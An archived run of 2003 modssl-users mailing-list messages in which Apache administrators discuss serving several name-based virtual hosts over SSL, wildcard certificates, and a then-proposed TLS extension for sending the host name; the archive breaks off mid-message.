>>DocumentRoot "/web2/"
>>
>>SSLEngine on
>>
>>SSLCertificateFile /usr/local/etc/apache/key/ssl2.cert
>>
>>SSLCertificateKeyFile /usr/local/etc/apache/key/ssl2.key
>>
>>
>>
>>...
>>
>> 
>>
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 04:25:35 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 5C4BF2AA0B4; Mon, 13 Jan 2003 04:25:35 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from arhosting.com (dns1.arhosting.com [216.63.180.37])
	by master.modssl.org (Postfix) with SMTP id C94A62AA086
	for ; Mon, 13 Jan 2003 04:25:28 +0100 (CET)
Received: (qmail 10745 invoked by uid 104); 13 Jan 2003 02:52:25 -0000
Received: from barry@arhosting.com by speedy.arhosting.com with qmail-scanner-0.96 (uvscan: v4.1.50/v4147. . Clean. Processed in 0.604047 secs); 13 Jan 2003 02:52:25 -0000
Received: from unknown (HELO antimatterxp) (216.63.180.34)
  by arhosting.com with SMTP; 13 Jan 2003 02:52:25 -0000
From: "Barry Smoke" 
To: 
Subject: RE: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
Date: Sun, 12 Jan 2003 21:23:27 -0600
Message-ID: <00cb01c2bab3$235e7360$640a140a@antimatterxp>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
In-Reply-To: <3E21DFE6.6050001@xtra.co.nz>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Barry Smoke" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>These NBVHs are all derived off the same 3rd-level domain, and thus we 
>can use the same wildcard certificate for each NBVH (users whose 
>browsers don't recognise wildcard certificates need only placate the 
>browser once in most cases).

o.k...you have my attention now...
wildcard certificate?
Can wildcard certificates be purchased, or is this only if you are self
signing?

I sure would like to buy one certificate, and have all my subdomains on
my main domain recognize it without a warning window popping up for
internet customers...

https://arhosting.com
https://www.arhosting.com
https://secure.arhosting.com
https://www.secure.arhosting.com

I would like to cover all of my bases with one certificate...
Is this possible?




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 10:32:30 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 72FCA2AA0B4; Mon, 13 Jan 2003 10:32:30 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id ECF542AA086
	for ; Mon, 13 Jan 2003 10:32:28 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id h0D9WQCT020576
	for ; Mon, 13 Jan 2003 10:32:27 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h0D9WPtZ011754
	for ; Mon, 13 Jan 2003 10:32:26 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: sorry all, test
Date: Mon, 13 Jan 2003 10:32:25 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A66A@SOMEXEVS001.ex.ordersx.org>
X-MS-Has-Attach: 
Importance: normal
X-MS-TNEF-Correlator: 
Thread-Topic: sorry all, test
Thread-Index: AcK6L6/JpByuthAkTyeovaRzTnEmoQAtvTkw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Nope.. It didn't work. We didn't see anything.

>-----Original Message-----
>From: Kyle O'Donnell [mailto:kyleo@onicrom.com]
>Sent: Sonntag, 12. Januar 2003 12:41
>To: modssl-users@modssl.org
>Subject: sorry all, test
>
>
>test
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 10:35:16 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2CF512AA0C6; Mon, 13 Jan 2003 10:35:16 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id E386B2AA086
	for ; Mon, 13 Jan 2003 10:35:10 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id BB0EA6E40B4; Mon, 13 Jan 2003 10:36:05 +0100 (CET)
Date: Mon, 13 Jan 2003 10:36:05 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
Message-ID: <20030113093605.GA14941@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <3E21DFE6.6050001@xtra.co.nz> <00cb01c2bab3$235e7360$640a140a@antimatterxp>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <00cb01c2bab3$235e7360$640a140a@antimatterxp>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Sun, Jan 12, 2003 at 09:23:27PM -0600, Barry Smoke wrote:
> o.k...you have my attention now...
> wildcard certificate?
> Can wildcard certificates be purchased, or is this only if you are self
> signing?
> 
According to Thawte's website they still issue wildcard certs.

> I sure would like to buy one certificate, and have all my subdomains on
> my main domain recognize it without a warning window popping up for
> internet customers...
> 
YMMV - some versions of MSIE does not accept wildcard certs because M$ 
decided to stop doing that for a couple of releases.

> https://arhosting.com
> https://www.arhosting.com
> https://secure.arhosting.com
> https://www.secure.arhosting.com
> 
> I would like to cover all of my bases with one certificate...
> Is this possible?
> 
*arhosting.com should probably do it.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 10:35:18 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 50C732AA0CB; Mon, 13 Jan 2003 10:35:18 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id F353A2AA0A5
	for ; Mon, 13 Jan 2003 10:35:14 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id h0D9ZDnQ028668
	for ; Mon, 13 Jan 2003 10:35:13 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h0D9ZBtZ011866
	for ; Mon, 13 Jan 2003 10:35:11 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
Date: Mon, 13 Jan 2003 10:35:11 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A66B@SOMEXEVS001.ex.ordersx.org>
X-MS-Has-Attach: 
Importance: normal
X-MS-TNEF-Correlator: 
Thread-Topic: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
Thread-Index: AcK6s4m29SWDAWtJQFy4X1PPaJzHNwAM1WMw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I believe you can get wildcard certs from Thwate. Check out their site.
NB - wildcards are like *.acme.com so www1.acme.com, www2.acme.com etc
all work. You cannot get *.*.com to work in any case.

Rgds,
Owen Boyle

>-----Original Message-----
>From: Barry Smoke [mailto:barry@arhosting.com]
>Sent: Montag, 13. Januar 2003 04:23
>To: modssl-users@modssl.org
>Subject: RE: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts
>with 2 Certificates)
>
>
>>These NBVHs are all derived off the same 3rd-level domain, 
>and thus we 
>>can use the same wildcard certificate for each NBVH (users whose 
>>browsers don't recognise wildcard certificates need only placate the 
>>browser once in most cases).
>
>o.k...you have my attention now...
>wildcard certificate?
>Can wildcard certificates be purchased, or is this only if you are self
>signing?
>
>I sure would like to buy one certificate, and have all my subdomains on
>my main domain recognize it without a warning window popping up for
>internet customers...
>
>https://arhosting.com
>https://www.arhosting.com
>https://secure.arhosting.com
>https://www.secure.arhosting.com
>
>I would like to cover all of my bases with one certificate...
>Is this possible?
>
>
>
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 10:45:55 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 727EA2AA0B4; Mon, 13 Jan 2003 10:45:55 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id C048C2AA086
	for ; Mon, 13 Jan 2003 10:45:53 +0100 (CET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id h0D9jpnQ029495
	for ; Mon, 13 Jan 2003 10:45:52 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h0D9joCt004372
	for ; Mon, 13 Jan 2003 10:45:50 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
Date: Mon, 13 Jan 2003 10:45:50 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A66C@SOMEXEVS001.ex.ordersx.org>
X-MS-Has-Attach: 
Importance: normal
X-MS-TNEF-Correlator: 
Thread-Topic: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
Thread-Index: AcK6gtZHfisQ5/DWRvKIMqbOZKU72QAZEoMg
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: James Collier [mailto:james.collier@xtra.co.nz]
>
>I realise I am on thin ice as it would be a "reasonable" 
>optimisation to assign the final virtual host at an earlier 
>stage than is currently the case with SSL.

I wouldn't worry too much. Currently, in an SSL transaction, *all*
information is regarded as requiring encryption - including the Host
header in the original request. So the SSL session has to be established
before any traffic takes place. Anything different (e.g. putting the
host header in the SSL layer) would be a major revision of the protocol.
One of two things will happen first:

- IPv6 will take off, creating so many IP addresses that NBVH will be
unnecessary and we will revert to one site, one IP.
- A new SSL-like protocol will appear which promotes the site name to
the SSL layer thus enabling NBVH.

Either way, you'll need substantially to upgrade and reconfigure your
server so you'll be well aware of the changes.

Rgds,

Owen Boyle

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 13:10:47 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 023862AA0B4; Mon, 13 Jan 2003 13:10:46 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mta203-rme.xtra.co.nz (mta203-rme.xtra.co.nz [210.86.15.146])
	by master.modssl.org (Postfix) with ESMTP id E5F642AA086
	for ; Mon, 13 Jan 2003 13:10:43 +0100 (CET)
Received: from mta3-rme.xtra.co.nz ([210.86.15.142])
          by mta203-rme.xtra.co.nz with ESMTP
          id <20030113121039.ZIQI1199.mta203-rme.xtra.co.nz@mta3-rme.xtra.co.nz>;
          Tue, 14 Jan 2003 01:10:39 +1300
Received: from xtra.co.nz ([210.86.54.166]) by mta3-rme.xtra.co.nz
          with ESMTP
          id <20030113121039.XUNU13460.mta3-rme.xtra.co.nz@xtra.co.nz>;
          Tue, 14 Jan 2003 01:10:39 +1300
Message-ID: <3E22ACBE.1040102@xtra.co.nz>
Date: Tue, 14 Jan 2003 01:10:38 +1300
From: James Collier 
User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.1) Gecko/20021207
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with
 2 Certificates)
References: <484A6CA492BE654395D208B1D8D5393973A66C@SOMEXEVS001.ex.ordersx.org>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Collier 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry - I didn't express that very well, but thanks for the reply.

At the moment, the handshake take place using the first matching vhost 
on the basis of IP+Port, but evidently Apache then scans the decrypted 
host header and assigns the correct NBVH. This is using 1.3.x; I haven't 
tested 2.x yet.

My fear is that future apache+modssl code may lock-in the first NBVH 
that matches on the basis of IP+Port, which would break my scheme.

   Regards,
      James.

PS For those of you who were wondering, we use a private CA to issue the 
wildcard server cert.  As someone has already noted, Thawte advertise 
them as well.

Boyle Owen wrote:
>>-----Original Message-----
>>From: James Collier [mailto:james.collier@xtra.co.nz]
>>
>>I realise I am on thin ice as it would be a "reasonable" 
>>optimisation to assign the final virtual host at an earlier 
>>stage than is currently the case with SSL.
                                         ^^^
                             I meant "apache+modssl"
> 
> 
> I wouldn't worry too much. Currently, in an SSL transaction, *all*
> information is regarded as requiring encryption - including the Host
> header in the original request. So the SSL session has to be established
> before any traffic takes place. Anything different (e.g. putting the
> host header in the SSL layer) would be a major revision of the protocol.
> One of two things will happen first:
> 
> - IPv6 will take off, creating so many IP addresses that NBVH will be
> unnecessary and we will revert to one site, one IP.
> - A new SSL-like protocol will appear which promotes the site name to
> the SSL layer thus enabling NBVH.
> 
> Either way, you'll need substantially to upgrade and reconfigure your
> server so you'll be well aware of the changes.
> 
> Rgds,
> 
> Owen Boyle
> 
> This message is for the named person's use only. It may contain
> confidential, proprietary or legally privileged information. No
> confidentiality or privilege is waived or lost by any mistransmission.
> If you receive this message in error, please notify the sender urgently
> and then immediately delete the message and any copies of it from your
> system. Please also immediately destroy any hardcopies of the message.
> You must not, directly or indirectly, use, disclose, distribute, print,
> or copy any part of this message if you are not the intended recipient.
> The sender's company reserves the right to monitor all e-mail
> communications through their networks. Any views expressed in this
> message are those of the individual sender, except where the message
> states otherwise and the sender is authorised to state them to be the
> views of the sender's company. 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 14:59:35 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 106F82AA086; Mon, 13 Jan 2003 14:59:35 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id 5A7362AA0A5
	for ; Mon, 13 Jan 2003 14:59:33 +0100 (CET)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.6/8.12.6) with ESMTP id h0DDxTCT029688
	for ; Mon, 13 Jan 2003 14:59:29 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.6/8.12.6) with ESMTP id h0DDwru5011025
	for ; Mon, 13 Jan 2003 14:59:27 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0
Subject: RE: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
Date: Mon, 13 Jan 2003 14:58:45 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393972F779@SOMEXEVS001.ex.ordersx.org>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
Thread-Index: AcK6/PoS8ZynwJu8QlGK7/xm/yzkhwADIPoA
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: James Collier [mailto:james.collier@xtra.co.nz]
>
>At the moment, the handshake take place using the first matching vhost=20
>on the basis of IP+Port, but evidently Apache then scans the decrypted=20
>host header and assigns the correct NBVH.=20

Exactly. The SSL transaction is handled by mod_ssl. The apache core is =
only used initially to deliver a certificate to the SSL Engine. As you =
rightly say, given only an IP address and port number, it simply =
responds with the first cert it finds in a matching VH. Having obtained =
a cert, mod_ssl establishes the SSL channel with the browser - =
thereafter, the requests are decrypted and passed "en clair" to the =
apache core. So now apache can apply its NBVH algorithm happily.=20

>This is using 1.3.x; I haven't tested 2.x yet.

It will be the same. This is a feature of the HTTPS layer and is =
unaffected by what happens in the apache core, which is under HTTPS.

>My fear is that future apache+modssl code may lock-in the first NBVH=20
>that matches on the basis of IP+Port, which would break my scheme.

Not likely. Each request is allowed to contain its own "Host" header. So =
there is no reason why the server should override it. In any case, there =
is no mechanism for the server to "remember" that subsequent requests =
from a particular client were originally served from a certain VH. HTTPS =
is an additional onion-layer which entirely encapsulates HTTP so there =
should be no spillover from one to the other.

Rgds,

Owen Boyle

>
>   Regards,
>      James.
>
>PS For those of you who were wondering, we use a private CA to=20
>issue the=20
>wildcard server cert.  As someone has already noted, Thawte advertise=20
>them as well.
>
>Boyle Owen wrote:
>>>-----Original Message-----
>>>From: James Collier [mailto:james.collier@xtra.co.nz]
>>>
>>>I realise I am on thin ice as it would be a "reasonable"=20
>>>optimisation to assign the final virtual host at an earlier=20
>>>stage than is currently the case with SSL.
>                                         ^^^
>                             I meant "apache+modssl"
>>=20
>>=20
>> I wouldn't worry too much. Currently, in an SSL transaction, *all*
>> information is regarded as requiring encryption - including the Host
>> header in the original request. So the SSL session has to be=20
>established
>> before any traffic takes place. Anything different (e.g. putting the
>> host header in the SSL layer) would be a major revision of=20
>the protocol.
>> One of two things will happen first:
>>=20
>> - IPv6 will take off, creating so many IP addresses that NBVH will be
>> unnecessary and we will revert to one site, one IP.
>> - A new SSL-like protocol will appear which promotes the site name to
>> the SSL layer thus enabling NBVH.
>>=20
>> Either way, you'll need substantially to upgrade and reconfigure your
>> server so you'll be well aware of the changes.
>>=20
>> Rgds,
>>=20
>> Owen Boyle
>>=20
>> This message is for the named person's use only. It may contain
>> confidential, proprietary or legally privileged information. No
>> confidentiality or privilege is waived or lost by any=20
>mistransmission.
>> If you receive this message in error, please notify the=20
>sender urgently
>> and then immediately delete the message and any copies of it=20
>from your
>> system. Please also immediately destroy any hardcopies of=20
>the message.
>> You must not, directly or indirectly, use, disclose,=20
>distribute, print,
>> or copy any part of this message if you are not the intended=20
>recipient.
>> The sender's company reserves the right to monitor all e-mail
>> communications through their networks. Any views expressed in this
>> message are those of the individual sender, except where the message
>> states otherwise and the sender is authorised to state them to be the
>> views of the sender's company.=20
>>=20
>______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                  =20
www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 16:28:00 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 957462AA0B4; Mon, 13 Jan 2003 16:28:00 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from romeo.rtfm.com (romeo.rtfm.com [198.144.203.242])
	by master.modssl.org (Postfix) with ESMTP id 02BF72AA086
	for ; Mon, 13 Jan 2003 16:27:58 +0100 (CET)
Received: by romeo.rtfm.com (Postfix, from userid 556)
	id 8CA3AAB01; Mon, 13 Jan 2003 07:32:24 -0800 (PST)
To: modssl-users@modssl.org
Subject: Re: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
References: <484A6CA492BE654395D208B1D8D5393973A66C@SOMEXEVS001.ex.ordersx.org>
From: Eric Rescorla 
Date: 13 Jan 2003 07:32:24 -0800
In-Reply-To: <484A6CA492BE654395D208B1D8D5393973A66C@SOMEXEVS001.ex.ordersx.org>
Message-ID: 
Lines: 11
User-Agent: Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.1 (Cuyahoga Valley)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eric Rescorla 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

"Boyle Owen"  writes:
> - IPv6 will take off, creating so many IP addresses that NBVH will be
> unnecessary and we will revert to one site, one IP.
There is already a document describing how to do this with SSL/TLS
in the IETF standards pipeline.

-Ekr

-- 
[Eric Rescorla                                   ekr@rtfm.com]
                http://www.rtfm.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 16:38:08 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7CC082AA0B4; Mon, 13 Jan 2003 16:38:08 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id E010D2AA086
	for ; Mon, 13 Jan 2003 16:38:06 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id BD2516E40B4; Mon, 13 Jan 2003 16:39:04 +0100 (CET)
Date: Mon, 13 Jan 2003 16:39:04 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
Message-ID: <20030113153904.GC14941@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <484A6CA492BE654395D208B1D8D5393973A66C@SOMEXEVS001.ex.ordersx.org> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, Jan 13, 2003 at 07:32:24AM -0800, Eric Rescorla wrote:
> There is already a document describing how to do this with SSL/TLS
> in the IETF standards pipeline.
> 
Unfortunately this is not implemented very many places - so far the only
place I've heard of is Apache 2.1 which has some preliminary and untested
code for it. If anyone knows of a compliant client, then that would be
much appreciated.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 13 17:03:45 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1BFEA2AA0B4; Mon, 13 Jan 2003 17:03:45 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from romeo.rtfm.com (romeo.rtfm.com [198.144.203.242])
	by master.modssl.org (Postfix) with ESMTP id 2199A2AA086
	for ; Mon, 13 Jan 2003 17:03:43 +0100 (CET)
Received: by romeo.rtfm.com (Postfix, from userid 556)
	id 00C34AB01; Mon, 13 Jan 2003 08:08:09 -0800 (PST)
To: modssl-users@modssl.org
Subject: Re: Confession: I use NBVHs with SSL (was Re: 2 VirtualHosts with 2 Certificates)
References: <484A6CA492BE654395D208B1D8D5393973A66C@SOMEXEVS001.ex.ordersx.org>
	 <20030113153904.GC14941@toftum.dk>
From: Eric Rescorla 
Date: 13 Jan 2003 08:08:09 -0800
In-Reply-To: <20030113153904.GC14941@toftum.dk>
Message-ID: 
Lines: 20
User-Agent: Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.1 (Cuyahoga Valley)
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eric Rescorla 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Mads Toftum  writes:

> On Mon, Jan 13, 2003 at 07:32:24AM -0800, Eric Rescorla wrote:
> > There is already a document describing how to do this with SSL/TLS
> > in the IETF standards pipeline.
> > 
> Unfortunately this is not implemented very many places - so far the only
> place I've heard of is Apache 2.1 which has some preliminary and untested
> code for it. If anyone knows of a compliant client, then that would be
> much appreciated.
I don't.

Moreover even if there were it will be like 2-3 years before it's
